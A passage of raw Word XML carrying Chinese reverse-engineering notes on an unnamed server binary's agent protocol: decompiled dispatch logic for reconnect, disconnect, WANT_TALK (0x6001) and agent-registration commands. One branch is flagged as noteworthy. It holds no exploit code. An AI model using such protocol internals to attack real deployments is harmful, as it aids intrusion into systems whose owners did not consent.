      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="54"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>{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// 断言：bit0 必须为 1</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve">    conn_id </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> sub_140ADA9F0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>conn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve">    result </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> sub_140BBA160</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>global_ctx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="54"/>
        </w:rPr>
        <w:t>1320</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> conn_id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> header</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>AgentID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72"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>v79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72"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>v82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72"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>v84</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>);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// sub_140BBA160 (RetransferRecord.cpp:46):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//   遍历链表 at global_ctx+1320+8，查找 (conn_id, agent_id) 匹配的重传记录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//   找到 → return 1；未找到 → return 0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if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>result</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>{</w:t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// 构建响应并调用 sub_140ADCDE0 → 重传连接成功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return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> sub_140ADCDE0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>v79</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> v117</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>}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// 未找到重传记录 → 静默返回（新鲜连接不走此路径）</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2930C774">
      <w:pPr>
        <w:pStyle w:val="13"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>结论</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：n4=4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>路径仅用于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>重连</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>场景（代理曾断线再重连）。新鲜连接永远不会走此路径。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098B006E">
      <w:pPr>
        <w:pStyle w:val="23"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>n4 = -1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（队列未命中）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2D76D8">
      <w:pPr>
        <w:pStyle w:val="49"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="64"/>
        </w:rPr>
        <w:t>// 直接静默返回，连接不关闭</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CDBD60">
      <w:pPr>
        <w:pStyle w:val="23"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">n4 = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>其他（含0）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（正常路径）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55238D8E">
      <w:pPr>
        <w:pStyle w:val="49"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="71"/>
        </w:rPr>
        <w:t>else</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="71"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve">n4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>!=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="54"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>{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// 断开协议 CMD(0x2902/0x2904) 处理...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if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>sub_140E31830</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>a2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>&amp;&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> CMD </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>!=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="55"/>
        </w:rPr>
        <w:t>0x6001</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="64"/>
        </w:rPr>
        <w:t>// bit0=1 且 CMD≠WANT_TALK</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>||</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> sub_140E31820</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>a2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>&amp;&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> CMD </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>==</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="55"/>
        </w:rPr>
        <w:t>0x6001</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="64"/>
        </w:rPr>
        <w:t>// bit0=0 且 CMD==WANT_TALK ← !!</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>{</w:t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// 将工作项投递到 sub_1402D1580 的线程池</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve">        sub_140C395C0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>threadpool</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="54"/>
        </w:rPr>
        <w:t>872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54"/>
        </w:rPr>
        <w:t>12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> sub_1402D1580</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> work_item</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> extra</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>}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else</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="71"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>sub_140E31820</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>a2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="64"/>
        </w:rPr>
        <w:t>// bit0=0 且 CMD≠WANT_TALK</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve">        sub_14019CA60</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>(...);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="64"/>
        </w:rPr>
        <w:t>// 其他断开处理</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="14"/>
    <w:bookmarkEnd w:id="15"/>
    <w:p w14:paraId="732DD07B">
      <w:pPr>
        <w:pStyle w:val="5"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="X051bad391c19f5fea29f7da42535069179b84b0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. DataTransfer CMD </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分发器（sub_1402D1580）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37867F6A">
      <w:pPr>
        <w:pStyle w:val="49"/>
        <w:rPr>
          <w:rStyle w:val="64"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="64"/>
        </w:rPr>
        <w:t>// sub_1402D1580</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9E3DB8">
      <w:pPr>
        <w:pStyle w:val="49"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4057650" cy="2819400"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="6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BD1ED">
      <w:pPr>
        <w:pStyle w:val="49"/>
      </w:pPr>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="71"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve">CMD </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>==</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="55"/>
        </w:rPr>
        <w:t>0x6000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>{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// CMD_READY - 特殊处理</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="71"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve">CMD </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>==</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="55"/>
        </w:rPr>
        <w:t>0x6001</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="64"/>
        </w:rPr>
        <w:t>// CMD_WANT_TALK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// "[WANT_TALK] AgentID: %d, Protocol: 0x%04X%s"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switch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>protocol_field</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>{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case</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="56"/>
        </w:rPr>
        <w:t>0x6640.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="81"/>
        </w:rPr>
        <w:t>.0x664B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> LABEL_38 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>log only</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>)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case</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="55"/>
        </w:rPr>
        <w:t>0x66B2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> sub_1408C96B0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t>task result notify</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>)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case</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="55"/>
        </w:rPr>
        <w:t>0x6475</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> sub_140161FC0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case</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="56"/>
        </w:rPr>
        <w:t>0x6625.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="81"/>
        </w:rPr>
        <w:t>.0x6627</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> LABEL_38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default</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> LABEL_45 → sub_140161FC0   ← 代理注册</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
